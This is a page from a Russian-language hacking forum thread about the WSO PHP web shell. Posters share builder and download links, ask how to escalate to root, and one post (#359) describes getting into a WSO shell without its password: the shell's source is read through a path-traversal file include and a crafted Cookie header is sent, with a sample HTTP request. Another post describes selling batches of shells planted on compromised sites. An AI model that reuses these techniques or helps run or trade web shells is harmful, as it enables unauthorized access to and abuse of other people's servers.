HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Избранное
Перезагрузить страницу WSO (веб-шелл)
   
Ответ
Страница 36 из 58 « Первая < 26 32 33 34 35 36 37 38 39 40 46 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #351  
Старый 21.10.2012, 20:47
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Цитата:
Сообщение от null  
null said:
Какой пароль стоит по умолчанию для входа или, где его ставить?
Для получения пароля, отправь СМС на короткий номер 9535 с текстом, "WSO 2.5" в ответ получишь пароль
 
Ответить с цитированием

  #352  
Старый 22.10.2012, 01:17
m00c0w
Guest
Сообщений: n/a
Провел на форуме:
36927

Репутация: 5
По умолчанию
Цитата:
Сообщение от null  
null said:
Какой пароль стоит по умолчанию для входа или, где его ставить?
Открой исходник, там всё есть

или задай сам, с нужными опциями

http://kronus.me/cn/wso-builder/1.04/
 
Ответить с цитированием

  #353  
Старый 23.10.2012, 04:56
alextrust
Новичок
Регистрация: 29.03.2010
Сообщений: 0
Провел на форуме:
9648

Репутация: 0
По умолчанию
Цитата:
Сообщение от null  
null said:
Какой пароль стоит по умолчанию для входа или, где его ставить?
root
 
Ответить с цитированием

  #354  
Старый 23.10.2012, 21:43
dean999
Guest
Сообщений: n/a
Провел на форуме:
17692

Репутация: 0
По умолчанию
как его научить работать с suid файлами?
 
Ответить с цитированием

  #355  
Старый 24.10.2012, 06:45
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от dean999  
dean999 said:
как его научить работать с suid файлами?
Используя вот это
 
Ответить с цитированием

  #356  
Старый 24.10.2012, 10:28
dean999
Guest
Сообщений: n/a
Провел на форуме:
17692

Репутация: 0
По умолчанию
WSO 2.5 modif - выдает ошибку "Query did not return anything"

что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка.

Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)
 
Ответить с цитированием

  #357  
Старый 24.10.2012, 13:35
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию
Цитата:
Сообщение от dean999  
dean999 said:
WSO 2.5 modif - выдает ошибку "Query did not return anything"
что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка.
Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)
напиши в личку,может помогу
 
Ответить с цитированием

  #358  
Старый 25.10.2012, 14:14
foxinvisible
Guest
Сообщений: n/a
Провел на форуме:
12830

Репутация: 10
По умолчанию
Цитата:
Сообщение от nullik  
nullik said:
Некий WSO 2.6 кому сильно надо.
http://pastebin.com/Xneg3zJu
А чего нет в 2.5 ? Зачем вообще обновление?
 
Ответить с цитированием

  #359  
Старый 01.11.2012, 19:07
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Не то, что бы это дикий пиздец, но если вдруг, вы забыли пароль к своему шеллу WSO, и у вас есть возможность прочитать исходник, можно увидеть вполне элементарную строчку:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"5deeb7c8589e337d46a3b2f807af33fd"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]# md5(пароль)[/COLOR][/COLOR] 
Но к сожалению если ваша память коротка, а cmd5 и подобные сервисы не в силах сбрутить пароль по типу "md5(FmST[3XjPW) = 5deeb7c8589e337d46a3b2f807af33fd", а текстовый документ с исходным паролем чудом не сохранился. Расстраиваться не нужно. Достаточно послать в запросе в заголовке Cookie md5 сумму хоста, и прочитанный хеш.

К примеру, шелл тут: http://google.com/images/wso.php

Возможность прочитать исходник тут: http://google.com/index.php?file=../images/wso.php

Получаем:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"5deeb7c8589e337d46a3b2f807af33fd"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]# md5(пароль)[/COLOR][/COLOR] 
Посылаем запрос:

Код:
Code:
GET /images/wso.php HTTP/1.1
Host: google.com
Cookie: 1d5920f4b44b27a802bd77c4f0536f5a=5deeb7c8589e337d46a3b2f807af33fd
Меняем пароль, на тот который в состоянии запомнить, и всё.

Не знаю кому эта информация сможет пригодиться, но пусть полежит здесь.
 
Ответить с цитированием

  #360  
Старый 01.11.2012, 19:19
foxinvisible
Guest
Сообщений: n/a
Провел на форуме:
12830

Репутация: 10
По умолчанию
У меня сделка через 4 часа..

Человек оплачивает хххх$ с протекцией, потом получает пачку шеллов залитый, потом передаёт код, а потом я передаю пароль. Вот я и думаю теперь насколько вероятно для него будет не дать мне код протекции (человек сомнительный, если честно), а просто попытаться расшифровать хэш =)
 
Ответить с цитированием
Ответ
Страница 36 из 58 « Первая < 26 32 33 34 35 36 37 38 39 40 46 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости. Обсуждения. 5 13.06.2007 02:07
Переделанный шелл! k1b0rg PHP 33 03.04.2007 08:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ